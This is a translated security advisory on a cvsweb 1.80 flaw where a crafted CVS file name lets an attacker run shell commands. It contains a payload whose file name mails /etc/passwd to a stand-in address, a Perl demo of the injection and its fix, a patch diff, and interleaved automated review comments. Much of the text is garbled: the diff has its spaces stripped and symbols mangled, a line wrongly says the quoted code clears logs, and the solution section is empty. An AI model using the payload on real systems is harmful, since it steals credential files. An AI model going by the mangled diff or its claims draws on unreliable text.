cvsweb remote shell access vulnerability

(2000-07-15 00:00) (source unknown) (京九)
Summary: cvsweb 1.80 contains a vulnerability that can give an intruder shell access; the attacker must first have write access to a cvs repository...
Vulnerability published: 2000-7-14 16:02:00
Vulnerability description:

cvsweb 1.80 contains a vulnerability that can give an intruder shell access. The attacker must first have write access to a cvs repository.

The form the attacker typically uses is as follows:

SHELLCODE=";perl -e \$_=q{mail foo#bar.baz<!etc!passwd};y:!#:\x2F\x40:;system\$_;"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m $SHELLCODE

The attacker then executes the planted trojan by browsing the cvsweb page, or waits for someone else to browse it. This sends the system's /etc/passwd file to the attacker's mailbox.

Because log records are retained, the log can be cleared with the following code:

open($fh, "rlog $filenames 2>/dev/null |")
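The injection in the pipe open above, next to the fork/exec pattern that cvsweb 1.86 adopts, as an added example that is not part of the original advisory or of cvsweb's own code. `echo` stands in for rlog so it runs on any system with Perl, and the file name is a constructed sample.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Vulnerable pattern from cvsweb 1.80: a two-argument pipe open hands one
# command string to /bin/sh, so metacharacters inside the file names are
# parsed as shell syntax. `echo` stands in for rlog so this runs anywhere.
sub run_via_shell {
    my ($filenames) = @_;
    open(my $fh, "echo $filenames 2>/dev/null |") or die "open: $!";
    my @out = <$fh>;
    close($fh);                      # close() also reaps the child
    return join("", @out);
}

# Hardened pattern adopted in 1.86, plus the checks the patch leaves out:
# fork through open("-|"), treat an undef return as fork failure rather
# than as the child, and exit the child if exec itself fails.
sub run_via_exec {
    my @argv = @_;
    my $pid = open(my $fh, "-|");
    die "fork failed: $!" unless defined $pid;
    if ($pid == 0) {                                # child
        open(STDERR, ">&", \*STDOUT) or exit 1;     # 2>&1 without a shell
        exec { $argv[0] } @argv;                    # list form, no /bin/sh
        exit 1;                                     # reached only if exec failed
    }
    my @out = <$fh>;                                # parent reads the pipe
    close($fh);
    return join("", @out);
}

# Constructed file name carrying a shell command separator.
my $name = "ftp.c; echo INJECTED";
print "via shell: ", run_via_shell($name);
print "via exec:  ", run_via_exec("echo", $name);
```

The first call prints two lines, `ftp.c` and `INJECTED`, because the shell split the name at `;`; the second prints the whole name as one literal argument.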


The patch for the vulnerability follows:

Version 1.86 has been released and fixes this vulnerability.

---cvsweb.cgi2000/05/2407:10:311.10
+++cvsweb.cgi2000/07/0703:32:21
@@-1185,23+1185,22@@
}

if(defined($rev)){
-$revopt="-r$rev";
+$revopt="-r$rev";
}
else{
$revopt="";
}

-#thismaynotbequotedwithsinglequotes
-#inwindows..butshouldinU*nx.there
-#isafunctionwhichallowsforquoting`evil`
-#characterssomewhere,Iknow(buriedinthePerl-manpage)
-##
###justfortherecord:
###cvscoseemstohaveabugregardingsinglecheckoutof
###directories/fileshavingspacesinit;
###thisisanissuethatshouldberesolvedoncvssside
-open($fh,"cvs-d$cvsrootco-p$revopt$where2$#@62;&1|")||
-&fatal("500InternalError","Couldntco:$!");
+#
+#Safelyforkachildprocesstoreadfrom.
+if(!open($fh,"-|")){#child
+open(STDERR,"$#@62;&STDOUT");#Redirectstderrtostdout
+exec("cvs","-d$cvsroot","co","-p",$revopt,$where);
+}
#===================================================================
#Checkingoutsquid/src/ftp.c
#RCS:/usr/src/CVS/squid/src/ftp.c,v
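Review bot: the child test `+if(!open($fh,"-|")){#child` does not distinguish a fork failure (open returns undef) from the child (open returns 0), so on fork failure the parent itself reaches `exec("cvs", ...)` and the CGI process is replaced by cvs; nothing follows the exec either, so a child whose exec fails runs on into the parent's code. Check `defined` on the return value, report failure through fatal() as the removed `||&fatal(...)` line did, and add `exit 1` after the exec. Separately, `$revopt` is set to `""` when no revision is given and is now passed as an empty argv element to cvs, which the old string form silently dropped; build the argument list conditionally instead. The `-`/`+` pair for `$revopt="-r$rev"` is identical in this extraction, so that part of the change cannot be reviewed here.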
@@-1298,7+1297,7@@
subdoDiff{
my($fullname,$r1,$tr1,$r2,$tr2,$f)=@_;
my$fh=do{local(*FH);};
-my($rev1,$rev2,$sym1,$sym2,$difftype,$diffname,$ $f2);
+my($rev1,$rev2,$sym1,$sym2,@difftype,$diffname,$f1,$f2);

if($r1=~/([^:]+)(:(.+))?/){
$rev1=$1;
@@-1333,25+1332,25@@
}
my$human_readable=0;
if($feqc){
-$difftype=-c;
+@difftype=qw{-c};
$diffname="Contextdiff";
}
elsif($feqs){
-$difftype=--side-by-side--width=164;
+@difftype=qw{--side-by-side--width=164};
$diffname="SidebySide";
}
elsif($feqH){
$human_readable=1;
-$difftype=--unified=15;
+@difftype=qw{--unified=15};
$diffname="LongHumanreadable";
}
elsif($feqh){
-$difftype=-u;
+@difftype=qw{-u};
$human_readable=1;
$diffname="Humanreadable";
}
elsif($fequ){
-$difftype=-u;
+@difftype=qw{-u};
$diffname="Unidiff";
}
else{
@@-1361,22+1360,19@@
#applyspecialoptions
if($human_readable){
if($hr_funout){
-$difftype=$difftype.-p;
+push@difftype,-p;
}
if($hr_ignwhite){
-$difftype=$difftype.-w;
+push@difftype,-w;
}
if($hr_ignkeysubst){
-$difftype=$difftype.-kk;
+push@difftype,-kk;
}
}
-##cvsrdiffdoesntsupport-pand-woption..sad
-#open($fh,"cvs-d$cvsrootrdiff$difftype".
-#"-r$rev1-r$rev2$where2$#@62;&1|")
-#||&fatal("500InternalError","Couldntcvsrdiff:$!");
-###
-open($fh,"rcsdiff$difftype-r$rev1-r$rev2$fullname2$#@62;&1|")
-||&fatal("500InternalError","CouldntGNUrcsdiff:$!");
+if(!open($fh,"-|")){#child
+open(STDERR,"$#@62;&STDOUT");#Redirectstderrtostdout
+exec("rcsdiff",@difftype,"-r$rev1","-r$rev2",$fullname);
+}
if($human_readable){
http_header();
&human_readable_diff($fh,$rev2);
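Review bot: the `||&fatal("500InternalError","CouldntGNUrcsdiff:$!")` error path is removed with nothing in its place; as in the checkout hunk, `+if(!open($fh,"-|")){#child` treats a fork failure as the child, and a failed `exec("rcsdiff",...)` falls through to `http_header()` and the diff rendering in the child because there is no `exit` after it. Add `exit 1` after the exec and have the parent call fatal() when open returns undef.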
@@-1402,7+1398,7@@
#---src/sys/netinet/tcp_output.c1995/12/0517:46:351.17RELENG_2_1_0
#(bogusexample,but...)
#
-if($difftypeeq-u){
+if(grep{$_eq-u}@difftype){
$f1=---;
$f2=\+\+\+;
}
@@-1455,15+1451,19@@
return;
}

-my($filenames)=join("",@files);
if($tag){
#cantuse-r$#@60;tag$#@62;as-isallowedintagnames,butmisinterpreatedbyrlog..
-open($fh,"rlog$filenames2$#@62;/dev/null|")
-||&fatal("500InternalError","FailedtospawnGNUrlog");
+if(!open($fh,"-|")){
+close(STDERR);#rlogmaycomplain;ignore.
+exec("rlog",@files);
+}
}
else{
-open($fh,"rlog-r$filenames2$#@62;/dev/null|")
-||&fatal("500InternalError","FailedtospawnGNUrlog");
+my$kidpid=open($fh,"-|");
+if(!$kidpid){
+close(STDERR);#rlogmaycomplain;ignore.
+exec("rlog","-r",@files);
+}
}
$state="start";
while($#@60;$fh$#@62;){
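Review bot: the two branches fork differently (`+if(!open($fh,"-|")){` versus `+my$kidpid=open($fh,"-|");`) yet neither checks `defined`, `$kidpid` is never used afterwards, and neither child exits after `exec("rlog",...)`, so the logic should be unified into one fork with `exit 1` after the exec. Also, `close(STDERR)` before the exec leaves fd 2 closed when rlog starts, so the first file rlog opens can land on fd 2 and receive its error output; reopening STDERR on /dev/null is the safer way to discard it.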
@@-1591,7+1591,7@@
}
if($.==0){
fatal("500InternalError",
-"FailedtospawnGNUrlogon$#@60;em$#@62;$filenames$#@60;/em$#@62;$#@60;p$#@62;didyousetthe

$#@60;b$#@62;\$ENV{PATH}$#@60;/b$#@62;inyourconfigurationfilecorrectly?");
+"FailedtospawnGNUrlogon$#@60;em$#@62;".join(",",@files)."$#@60;/em$#@62;$#@60;p$#@62;didyousetthe

$#@60;b$#@62;\$ENV{PATH}$#@60;/b$#@62;inyourconfigurationfilecorrectly?");
}
close($fh);
}
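Review bot: `join(",",@files)` is interpolated into the HTML error message inside `<em>` without escaping, so a file name containing `<` or `&` is emitted as markup; since this advisory shows that an attacker with commit access chooses these names, pass the joined list through an HTML-escaping helper before building the message (the removed `$filenames` form had the same problem).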
@@-1618,9+1618,14@@
undef%log;

print("Goingtorlog$fullname\n")if($verbose);
-open($fh,"rlog$revision$fullname|")
-||&fatal("500InternalError","Failedtospawnrlog");
-
+if(!open($fh,"-|")){#child
+if($revisionne){
+exec("rlog",$revision,$fullname);
+}
+else{
+exec("rlog",$fullname);
+}
+}
while($#@60;$fh$#@62;){
printif($verbose);
if($symnames){
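Review bot: the removed `-||&fatal("500InternalError","Failedtospawnrlog");` has no replacement, and nothing follows either `exec("rlog",...)` in the child, so a failed exec leaves the child running the parent's `while(<$fh>)` loop. Add `exit 1` after each exec (or `exec(...) or exit 1`), and test `defined` on the open's return in the parent; the `+if($revisionne){` line has lost its right-hand operand in this extraction, so that comparison cannot be checked here.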

Solution:
